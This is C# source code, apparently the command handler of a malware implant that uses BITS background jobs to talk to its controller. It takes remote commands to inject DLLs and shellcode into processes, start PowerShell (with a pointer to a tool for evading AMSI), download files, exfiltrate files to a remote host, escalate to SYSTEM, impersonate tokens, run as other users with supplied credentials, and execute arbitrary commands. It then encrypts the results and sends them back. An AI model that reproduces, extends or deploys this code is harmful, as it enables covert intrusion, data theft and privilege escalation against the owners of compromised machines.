public static void Main(string method, string[] arguments, Assembly dll) { var obj = new LauncherDll(); var thr1 = new Thread(ExecuteDllInMemory); var a = new object [] { method, arguments, dll }; thr1.Start(a); }
private void DoSomething(Content file) { var rps = ""; try { switch (file.Commands[0]) { case "inject_dll": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { try { var dll = LoadDll(fileP); var method = file.Commands[1]; var args = ""; for (var i = 2; i < file.Commands.Length; i++) { args += file.Commands[i]; if (i < file.Commands.Length) { args += " "; } } var arguments = new string[] { args }; LauncherDll.Main(method, arguments, dll); rps = "Dll injected!"; } catch (Exception) { rps = "ERR:Fatal error occurred while trying to inject the dll.\n"; } } else { rps = "ERR:Dll not found!\n"; } break; } case "inject_shellcode": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; var pid = -1; if (file.Commands.Length >= 2) { pid = int.Parse(file.Commands[1]); } if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { byte[] sh; GetEncryptedFileContent(fileP, out sh); try { LauncherShellCode.Main(sh, _sysCall, pid); rps = "Shellcode injected!\n"; } catch (Exception) { rps = "ERR:Fatal error occurred while trying to inject shellCode.\n"; } } else { rps = "ERR:Shellcode file not found!\n"; } break; } case "powershell": { rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi"); if (rps.Contains("hi")) { LauncherPowershell.Main(file.Commands[1], file.Commands[2]); rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n"; } else { rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n"; } break; } case "send": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { File.Copy(fileP, file.Commands[1], true); rps = "Dowload finished.\n"; } else { rps = "ERR:Download failed!\n"; } break; } case "exfiltrate": { if (File.Exists(file.Commands[1])) { if (_jobsManager.Send(file.Commands[2], file.Commands[1])) { rps = "Exfiltration succeed.\n"; } else { rps = "ERR:Exfiltration failed!\n"; } } else { rps = "ERR:File to exfiltrate not found!\n"; } break; } case "getsystem": { if (Utils.IsHighIntegrity(_sysCall)) { rps = TokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n"; } else { rps = "ERR:Process failed! Is this process running with high integrity level?\n"; } break; } case "rev2self": { TokenManager.Rev2Self(); rps = "Welcome back.\n"; break; } case "runas": { string user = "", domain = "", password = ""; var userData = file.Commands[1].Split('\\'); if (userData.Length == 1) { domain = "."; user = userData[0]; } else { domain = userData[0]; user = userData[1]; } password = file.Commands[2]; rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials."; break; } case "list": { rps = GetProcessInfo(); break; } case "impersonate": { try { if (_tokenManager.Impersonate(int.Parse(file.Commands[1]))) { rps = "Impersonation achieved!\n"; } else { rps = "ERR: Not enough privileges!\n"; } } catch { rps = "ERR: Impersonation failed!\n"; } break; } case "exit": { Environment.Exit(0); break; } default: { rps = Utils.ExecuteCommand(file.Commands[0]); break; } } } catch { rps = "ERR: Something went wrong!"; } var response = new Response(rps, _auth); var filePath = _tempPath + @"\" + _id + ".txt"; EncryptResponseIntoFile(filePath, response); TrySend(filePath); }